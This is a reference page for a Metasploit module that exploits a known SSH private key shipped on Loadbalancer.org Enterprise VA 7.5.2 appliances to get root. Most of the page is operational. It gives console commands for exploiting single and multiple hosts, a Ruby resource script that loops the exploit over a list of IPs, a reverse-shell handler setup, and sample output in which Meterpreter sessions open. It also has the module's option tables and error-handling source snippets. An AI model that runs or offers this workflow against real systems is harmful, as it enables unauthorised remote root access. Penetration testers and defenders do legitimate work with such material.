Loadbalancer.org Enterprise VA SSH Private Key Exposure - Metasploit


This page contains detailed information about how to use the exploit/linux/ssh/loadbalancerorg_enterprise_known_privkey metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Loadbalancer.org Enterprise VA SSH Private Key Exposure
Module: exploit/linux/ssh/loadbalancerorg_enterprise_known_privkey
Source code: modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb
Disclosure date: 2014-03-17
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: -
Target network port(s): 22
List of CVEs: -

Loadbalancer.org ships a public/private key pair on Enterprise virtual appliances version 7.5.2 that allows passwordless authentication to any other LB Enterprise box. Since the key is easily retrievable, an attacker can use it to gain unauthorized remote access as root.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using loadbalancerorg_enterprise_known_privkey against a single host

Normally, you can use exploit/linux/ssh/loadbalancerorg_enterprise_known_privkey this way:

msf > use exploit/linux/ssh/loadbalancerorg_enterprise_known_privkey
msf exploit(loadbalancerorg_enterprise_known_privkey) > show targets
    ... a list of targets ...
msf exploit(loadbalancerorg_enterprise_known_privkey) > set TARGET target-id
msf exploit(loadbalancerorg_enterprise_known_privkey) > show options
    ... show and set options ...
msf exploit(loadbalancerorg_enterprise_known_privkey) > exploit

Using loadbalancerorg_enterprise_known_privkey against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your loadbalancerorg_enterprise_known_privkey will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/linux/ssh/loadbalancerorg_enterprise_known_privkey")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the linux/ssh/loadbalancerorg_enterprise_known_privkey exploit module looks in the msfconsole:

msf6 > use exploit/linux/ssh/loadbalancerorg_enterprise_known_privkey

[*] Using configured payload cmd/unix/interact
msf6 exploit(linux/ssh/loadbalancerorg_enterprise_known_privkey) > show info

       Name: Loadbalancer.org Enterprise VA SSH Private Key Exposure
     Module: exploit/linux/ssh/loadbalancerorg_enterprise_known_privkey
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2014-03-17

Provided by:
  xistence <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Universal

Check supported:
  No

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT   22               yes       The target port

Payload information:

Description:
  Loadbalancer.org ships a public/private key pair on Enterprise 
  virtual appliances version 7.5.2 that allows passwordless 
  authentication to any other LB Enterprise box. Since the key is 
  easily retrievable, an attacker can use it to gain unauthorized 
  remote access as root.

References:
  https://packetstormsecurity.com/files/125754

Module Options


This is a complete list of options available in the linux/ssh/loadbalancerorg_enterprise_known_privkey exploit:

msf6 exploit(linux/ssh/loadbalancerorg_enterprise_known_privkey) > show options

Module options (exploit/linux/ssh/loadbalancerorg_enterprise_known_privkey):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   22               yes       The target port

Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Exploit target:

   Id  Name
   --  ----
   0   Universal

Advanced Options


Here is a complete list of advanced options supported by the linux/ssh/loadbalancerorg_enterprise_known_privkey exploit:

msf6 exploit(linux/ssh/loadbalancerorg_enterprise_known_privkey) > show advanced

Module advanced options (exploit/linux/ssh/loadbalancerorg_enterprise_known_privkey):

   Name                    Current Setting                          Required  Description
   ----                    ---------------                          --------  -----------
   ContextInformationFile                                           no        The information file that contains context information
   DisablePayloadHandler   false                                    no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                    no        Use transient context when encoding payloads
   SSH_DEBUG               false                                    no        Enable SSH debugging output (Extreme verbosity!)
   SSH_IDENT               SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3  yes       SSH client identification string
   SSH_TIMEOUT             30                                       no        Specify the maximum time to negotiate a SSH session
   VERBOSE                 false                                    no        Enable detailed status messages
   WORKSPACE                                                        no        Specify the workspace for this module
   WfsDelay                2                                        no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/unix/interact):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/ssh/loadbalancerorg_enterprise_known_privkey module can exploit:

msf6 exploit(linux/ssh/loadbalancerorg_enterprise_known_privkey) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Universal

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/ssh/loadbalancerorg_enterprise_known_privkey exploit:

msf6 exploit(linux/ssh/loadbalancerorg_enterprise_known_privkey) > show payloads

Compatible Payloads
===================

   #  Name                       Disclosure Date  Rank    Check  Description
   -  ----                       ---------------  ----    -----  -----------
   0  payload/cmd/unix/interact                   normal  No     Unix Command, Interact with Established Connection

Evasion Options


Here is the full list of possible evasion options supported by the linux/ssh/loadbalancerorg_enterprise_known_privkey exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/ssh/loadbalancerorg_enterprise_known_privkey) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<RHOST>:<RPORT> SSH - Disconnected during negotiation


Here is a relevant code snippet related to the "<RHOST>:<RPORT> SSH - Disconnected during negotiation" error message:

87:	        ssh_socket = Net::SSH.start(rhost, user, opt_hash)
88:	      end
89:	    rescue Rex::ConnectionError
90:	      return nil
91:	    rescue Net::SSH::Disconnect, ::EOFError
92:	      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
93:	      return nil
94:	    rescue ::Timeout::Error
95:	      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
96:	      return nil
97:	    rescue Net::SSH::AuthenticationFailed

<RHOST>:<RPORT> SSH - Timed out during negotiation


Here is a relevant code snippet related to the "<RHOST>:<RPORT> SSH - Timed out during negotiation" error message:

90:	      return nil
91:	    rescue Net::SSH::Disconnect, ::EOFError
92:	      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
93:	      return nil
94:	    rescue ::Timeout::Error
95:	      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
96:	      return nil
97:	    rescue Net::SSH::AuthenticationFailed
98:	      print_error "#{rhost}:#{rport} SSH - Failed authentication"
99:	      return nil
100:	    rescue Net::SSH::Exception => e

<RHOST>:<RPORT> SSH - Failed authentication


Here is a relevant code snippet related to the "<RHOST>:<RPORT> SSH - Failed authentication" error message:

93:	      return nil
94:	    rescue ::Timeout::Error
95:	      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
96:	      return nil
97:	    rescue Net::SSH::AuthenticationFailed
98:	      print_error "#{rhost}:#{rport} SSH - Failed authentication"
99:	      return nil
100:	    rescue Net::SSH::Exception => e
101:	      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
102:	      return nil
103:	    end

<RHOST>:<RPORT> SSH Error: <E.CLASS> : <E.MESSAGE>


Here is a relevant code snippet related to the "<RHOST>:<RPORT> SSH Error: <E.CLASS> : <E.MESSAGE>" error message:

96:	      return nil
97:	    rescue Net::SSH::AuthenticationFailed
98:	      print_error "#{rhost}:#{rport} SSH - Failed authentication"
99:	      return nil
100:	    rescue Net::SSH::Exception => e
101:	      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
102:	      return nil
103:	    end
104:	
105:	    if ssh_socket
106:	

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


xistence <xistence[at]0x90.nl>

Version


This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.